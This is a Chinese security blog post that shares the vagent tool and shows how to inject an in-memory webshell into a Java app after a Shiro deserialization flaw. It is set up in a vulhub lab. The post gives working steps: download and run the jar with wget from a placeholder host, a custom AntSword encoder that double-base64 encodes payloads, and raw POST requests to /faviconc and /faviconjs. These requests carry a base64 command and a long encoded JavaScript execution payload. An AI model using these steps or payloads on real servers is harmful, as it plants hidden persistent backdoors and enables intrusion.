神兵利器 | vagent内存马注入Tools（超详细）

admin

138897
文章

114
评论

2023年12月17日00:49:47评论107 views字数 4896阅读16分19秒阅读模式

一、模拟环境

首先模拟了一个通过shiro反序列化漏洞，该环境以部署jar包方式，并且无法通过shiro工具打入内存马，需要手动注入内存马

vulhub上的CVE-2010-3863环境

cd  /root/vulhub-master/shiro/CVE-2010-3863docker-composer  up -d

神兵利器 | vagent内存马注入Tools（超详细）

进入到容器中

docker  exec  -it   cve-2010-3863_web_1   /bin/bash

神兵利器 | vagent内存马注入Tools（超详细）

需要下载工具 vagent

https://github.com/veo/vagent可以直接打入内存马

起一个python3服务python3  -m http.server   81

wget http://xx.xx.xx.xx:81/vagent.jar  //下载工具

java -jar  vagent.jar  //执行该工具 返回 id >>> 1 执行成功

神兵利器 | vagent内存马注入Tools（超详细）

二、工具分析

CMD方式

以CMD方式运行时，需要POST faviconc方式运行，并且base64加密2次才可以，以参数c的方式进行运行

神兵利器 | vagent内存马注入Tools（超详细）

JS代码执行马

需要POST faviconjs方式运行，以参数a的方式进行运行

神兵利器 | vagent内存马注入Tools（超详细）
蚁剑可以连接需要新增自定义加密

神兵利器 | vagent内存马注入Tools（超详细）

这里我们需要自定义一下加密方式
参考链接

https://darkless.cn/2020/05/19/antsword-bypass-waf/

神兵利器 | vagent内存马注入Tools（超详细）

/** * php::base64编码器 * Create at: 2023/12/08 15:58:49 */

'use strict';

/** @param  {String} pwd   连接密码* @param  {Array}  data  编码器处理前的 payload 数组* @return {Array}  data  编码器处理后的 payload 数组*/module.exports = (pwd, data, ext={}) => {  // ##########    请在下方编写你自己的代码   ###################  // 以下代码为 PHP Base64 样例

  // 生成一个随机变量名

  // 原有的 payload 在 data['_']中  // 取出来之后，转为 base64 编码并放入 randomID key 下  data[pwd]= Buffer.from(Buffer.from(data['_']).toString('base64')).toString('base64');





  // ##########    请在上方编写你自己的代码   ###################

  // 删除 _ 原有的payload  delete data['_'];  // 返回编码器处理后的 payload 数组  return data;}

神兵利器 | vagent内存马注入Tools（超详细）

可以连接成功！

三、具体利用方式

CMD方式

POST /faviconc HTTP/1.1Host: xxxxxxx:8080User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PUBLICCMS_ANALYTICS_ID=a78832e8-21a6-47a6-bdf1-81f65d60ec34; PUBLICCMS_ADMIN=1_08903062-c592-48b4-a167-38d5b6b967d7; sessionID=50fd23a2deeb818ba5ecbbd09c99c0ee; PHPSESSID=tu8p4vkjvr7clpmeceou610021; JSESSIONID=D18E0C1AF4AB8438F75E42C80ECEDB1FUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1Content-Length: 18

c=ZDJodllXMXA=

其中ZDJodllXMXA=为两次base64解密的whomai值

神兵利器 | vagent内存马注入Tools（超详细）

JS代码执行马

POST /faviconjs HTTP/1.1Host: xx.xx.xx.xx:8080Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 2734Connection: close

a=ZEhKNUlIdHNiMkZrS0NKdVlYTm9iM0p1T20xdmVtbHNiR0ZmWTI5dGNHRjBMbXB6SWlrN2ZTQmpZWFJqYUNBb1pTa2dlMzFwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxtcGhkbUV1ZFhScGJDazdhVzF3YjNKMFVHRmphMkZuWlNoUVlXTnJZV2RsY3k1cVlYWmhMbXhoYm1jcE8ybHRjRzl5ZEZCaFkydGhaMlVvVUdGamEyRm5aWE11YW1GMllTNXBieWs3ZG1GeUlHOTFkSEIxZENBOUlHNWxkeUJUZEhKcGJtZENkV1ptWlhJb0lpSXBPM1poY2lCamN5QTlJQ0pWVkVZdE9DSTdkbUZ5SUhSaFoxOXpJRDBnSW1Saklpc2lPV1ZsSWp0MllYSWdkR0ZuWDJVZ1BTQWlOekVpS3lKaVptTWlPM1J5ZVNCN1puVnVZM1JwYjI0Z1pHVmpiMlJsS0hOMGNpa2dlM04wY2lBOUlITjBjaTV6ZFdKemRISW9NaWs3ZG1GeUlHSjBQVUpoYzJVMk5FUmxZMjlrWlZSdlFubDBaU2h6ZEhJcE8zSmxkSFZ5YmlCdVpYY2dhbUYyWVM1c1lXNW5MbE4wY21sdVp5aGlkQ3hqY3lrN2ZXWjFibU4wYVc5dUlFSmhjMlUyTkVSbFkyOWtaVlJ2UW5sMFpTaHpkSElwSUh0cGJYQnZjblJRWVdOcllXZGxLRkJoWTJ0aFoyVnpMbk4xYmk1dGFYTmpLVHRwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxtcGhkbUV1ZFhScGJDazdkbUZ5SUdKME8zUnllU0I3WW5RZ1BTQnVaWGNnUWtGVFJUWTBSR1ZqYjJSbGNpZ3BMbVJsWTI5a1pVSjFabVpsY2loemRISXBPMzBnWTJGMFkyZ2dLR1VwSUh0aWRDQTlJRUpoYzJVMk5DNW5aWFJFWldOdlpHVnlLQ2t1WkdWamIyUmxLSE4wY2lrN2ZYSmxkSFZ5YmlCaWREdDlablZ1WTNScGIyNGdZWE5sYm1Nb2MzUnlLWHRwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxuTjFiaTV0YVhOaktUdHBiWEJ2Y25SUVlXTnJZV2RsS0ZCaFkydGhaMlZ6TG1waGRtRXVkWFJwYkNrN2RtRnlJSEpsZENBOUlDSWlPM1J5ZVNCN2NtVjBJRDBnYm1WM0lFSmhjMlUyTkNncExtZGxkRVZ1WTI5a1pYSW9LUzVsYm1OdlpHVlViMU4wY21sdVp5aHpkSEl1WjJWMFFubDBaWE1vS1NrN2ZTQmpZWFJqYUNBb1pTa2dlM0psZENBOUlHNWxkeUJDUVZORk5qUkZibU52WkdWeUtDa3VaVzVqYjJSbEtITjBjaTVuWlhSQ2VYUmxjeWdwS1R0OWNtVjBJRDBnY21WMExuSmxjR3hoWTJWQmJHd29JbHh5ZkZ4dUlpd2dJaUlwTzNKbGRIVnliaUJ5WlhRN2ZXWjFibU4wYVc5dUlGTjVjMGx1Wm05RGIyUmxLQ2tnZTNaaGNpQmtJRDBnVTNsemRHVnRMbWRsZEZCeWIzQmxjblI1S0NKMWMyVnlMbVJwY2lJcE8zWmhjaUJ6WlhKMlpYSkpibVp2SUQwZ1UzbHpkR1Z0TG1kbGRGQnliM0JsY25SNUtDSnZjeTV1WVcxbElpazdkbUZ5SUhWelpYSWdQU0JUZVhOMFpXMHVaMlYwVUhKdmNHVnlkSGtvSW5WelpYSXVibUZ0WlNJcE8zWmhjaUJrY21sMlpYSnNhWE4wSUQwZ1YzZDNVbTl2ZEZCaGRHaERiMlJsS0dRcE8zSmxkSFZ5YmlCa0lDc2dJZ2tpSUNzZ1pISnBkbVZ5YkdsemRDQXJJQ0lKSWlBcklITmxjblpsY2tsdVptOGdLeUFpQ1NJZ0t5QjFjMlZ5TzMxbWRXNWpkR2x2YmlCWGQzZFNiMjkwVUdGMGFFTnZaR1VvWkNrZ2UzWmhjaUJ6SUQwZ0lpSTdhV1lnS0NGa0xuTjFZbk4wY21sdVp5Z3dMQ0F4S1M1bGNYVmhiSE1vSWk4aUtTa2dlM1poY2lCeWIyOTBjeUE5SUdwaGRtRXVhVzh1Um1sc1pTNXNhWE4wVW05dmRITW9LVHRtYjNJZ0tIWmhjaUJwSUQwZ01Ec2dhU0E4SUhKdmIzUnpMbXhsYm1kMGFEc2dhU3NyS1NCN2N5QXJQU0J5YjI5MGMxdHBYUzUwYjFOMGNtbHVaeWdwTG5OMVluTjBjbWx1Wnlnd0xDQXlLU0FySUNJaU8zMTlJR1ZzYzJVZ2UzTWdLejBnSWk4aU8zMXlaWFIxY200Z2N6dDliM1YwY0hWMExtRndjR1Z1WkNoVGVYTkpibVp2UTI5a1pTZ3BLVHQ5SUdOaGRHTm9JQ2hsS1NCN2IzVjBjSFYwTG1Gd2NHVnVaQ2dpUlZKU1QxSTZMeThnSWlBcklHVXVkRzlUZEhKcGJtY29LU2s3ZlhaaGNpQnlaWE4xYkhROWRHRm5YM01nS3lCaGMyVnVZeWh2ZFhSd2RYUXVkRzlUZEhKcGJtY29LU2tnS3lCMFlXZGZaVHQwY25rZ2UzSmxjM0J2Ym5ObExtZGxkRmR5YVhSbGNpZ3BMbkJ5YVc1MEtISmxjM1ZzZENrN2ZTQmpZWFJqYUNBb1pTa2dlM0psYzNWc2REdDk=

神兵利器 | vagent内存马注入Tools（超详细）

主要是利用蚁剑来实现。

原文始发于微信公众号（阿无安全）：神兵利器 | vagent内存马注入Tools（超详细）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

神兵利器 | vagent内存马注入Tools（超详细）

一、模拟环境

二、工具分析

三、具体利用方式

震惊！同为硬件信息查看神器，lshw 和 dmidecode 竟有这么多不同

CF-Hero：自动绕过CDN找真实ip地址

【工具分享】ruoyi-Vue-tools-若依Vue漏洞检测工具v4更新

OpenManus自定义Tools-自动化渗透测试(二)

BurpSuite AI插件 EnhancedBurpGPT

LoadRunner在MQTT协议中的应用案例 LoadRunner如何实现加密流量测试

50款渗透测试工具供您参考！

实用工具分享|Listary【搜索文件和快速启动软件】

什么？这些干安全的猴子真的只需要点点鼠标了？

应急响应-工具-ELK日志分析系统与Yara规则识别样本

发表评论

在线咨询

微信